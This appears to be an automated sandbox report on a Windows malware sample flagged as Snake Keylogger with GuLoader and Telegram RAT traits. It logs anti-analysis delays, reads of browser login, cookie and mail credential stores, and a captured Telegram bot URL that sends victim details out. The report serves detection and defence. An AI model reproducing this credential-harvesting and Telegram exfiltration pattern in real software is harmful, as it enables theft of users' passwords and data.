Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596826 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596593 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596373 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596046 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595061 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594515 Jump to behavior
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(5
Source: C:\Users\user\Desktop\rFa24c148.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\rFa24c148.exe API call chain: ExitProcess graph end node
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Enables debug privileges
Source: C:\Users\user\Desktop\rFa24c148.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rFa24c148.exe Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Users\user\Desktop\rFa24c148.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405D99
Source: C:\Users\user\Desktop\rFa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543495 Sample: rFa24c148.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 17 reallyfreegeoip.org 2->17 19 api.telegram.org 2->19 21 4 other IPs or domains 2->21 29 Found malware configuration 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Yara detected GuLoader 2->33 39 3 other signatures 2->39 7 rFa24c148.exe 3 45 2->7         started        signatures3 35 Tries to detect the country of the analysis system (by using the IP) 17->35 37 Uses the Telegram API (likely for C&C communication) 19->37 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 41 Tries to detect virtualization through RDTSC time measurements 7->41 43 Switches to a custom stack to bypass stack traces 7->43 11 rFa24c148.exe 15 8 7->11         started        signatures6 process7 dnsIp8 23 api.telegram.org 149.154.167.220, 443, 49787 TELEGRAMRU United Kingdom 11->23 25 reallyfreegeoip.org 188.114.96.3, 443, 49739, 49740 CLOUDFLARENETUS European Union 11->25 27 3 other IPs or domains 11->27 45 Tries to steal Mail credentials (via file / registry access) 11->45 47 Tries to harvest and steal browser information (history, passwords, etc) 11->47 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
172.217.18.110
 drive.google.com United States
15169 GOOGLEUS false
142.250.185.225
 drive.usercontent.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 172.217.18.110 true
drive.usercontent.google.com 142.250.185.225 true
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    https://reallyfreegeoip.org/xml/155.94.241.188 false
      		unknown